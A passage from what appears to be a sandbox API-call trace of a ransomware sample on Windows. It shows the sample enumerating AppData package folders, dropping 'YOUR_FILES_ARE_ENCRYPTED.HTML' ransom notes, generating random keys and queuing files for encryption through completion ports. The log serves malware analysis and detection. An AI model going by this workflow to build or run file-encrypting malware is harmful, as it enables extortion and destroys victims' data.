param_1=0x19ddca, param_2="%02X" | out: param_1="9F") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D4") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="32") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="D1") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="15") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="16") returned 2 [0115.380] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="0D") returned 2 [0115.380] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="EA") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="BB") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="49") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="61") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="DC") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="86") returned 2 [0115.380] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="55") returned 2 [0115.380] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="64") returned 2 [0115.380] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="56") returned 2 [0115.380] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="6C") returned 2 [0115.380] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="BD") returned 2 [0115.380] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="67") returned 2 [0115.381] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.381] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.381] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2a1752a1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a1752a1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a1752a1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.381] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.381] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 174 [0115.381] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.381] lstrlenW (lpString=".LOG1") returned 5 [0115.381] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2a1752a1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a1752a1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a1752a1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.381] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.381] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 174 [0115.381] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.381] lstrlenW (lpString=".LOG2") returned 5 [0115.381] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2a1752a1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a1752a1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a1752a1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x3187ad0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.381] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.381] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 179 [0115.381] GetProcessHeap () returned 0x600000 [0115.381] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.382] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.383] CloseHandle (hObject=0x324) returned 1 [0115.383] GetProcessHeap () returned 0x600000 [0115.383] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.383] GetProcessHeap () returned 0x600000 [0115.383] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.383] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29fd18d6, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x29fd18d6, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a2120ec, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.384] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.384] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 163 [0115.384] GetProcessHeap () returned 0x600000 [0115.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.384] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.385] CloseHandle (hObject=0x214) returned 1 [0115.385] GetProcessHeap () returned 0x600000 [0115.385] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.386] GetProcessHeap () returned 0x600000 [0115.386] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.387] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f21066, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f21066, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f21066, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.387] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.387] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState") returned 96 [0115.387] GetProcessHeap () returned 0x600000 [0115.387] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.388] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState" [0115.388] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState\\*" [0115.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f21066, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f21066, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f21066, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.388] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f21066, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f21066, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f21066, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.388] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f21066, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f21066, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f21066, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.388] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.389] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.389] GetProcessHeap () returned 0x600000 [0115.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.390] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.390] CloseHandle (hObject=0x214) returned 1 [0115.390] GetProcessHeap () returned 0x600000 [0115.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.391] GetProcessHeap () returned 0x600000 [0115.391] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.391] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.391] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.391] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings") returned 92 [0115.391] GetProcessHeap () returned 0x600000 [0115.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.392] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings" [0115.392] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\*" [0115.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.392] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.392] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2714f314, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2714f314, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2714f314, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.392] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.392] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 105 [0115.392] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.392] lstrlenW (lpString=".lock") returned 5 [0115.393] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.393] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.393] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.393] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat") returned 105 [0115.393] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.393] lstrlenW (lpString=".dat") returned 4 [0115.393] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.393] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0115.393] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.393] GetProcessHeap () returned 0x600000 [0115.393] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.395] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="0F") returned 2 [0115.395] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A3") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DF") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="23") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="16") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="32") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="74") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="19") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="03") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C0") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="DE") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="A9") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="70") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="4B") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4A") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="04") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="94") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A0") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A9") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B6") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="ED") returned 2 [0115.396] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="F2") returned 2 [0115.396] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A9") returned 2 [0115.396] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B7") returned 2 [0115.396] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="02") returned 2 [0115.396] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="35") returned 2 [0115.396] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="9A") returned 2 [0115.396] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="96") returned 2 [0115.396] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="30") returned 2 [0115.396] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="95") returned 2 [0115.396] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="D6") returned 2 [0115.396] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="05") returned 2 [0115.397] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.397] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.397] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.397] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.397] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.397] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.397] GetProcessHeap () returned 0x600000 [0115.397] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 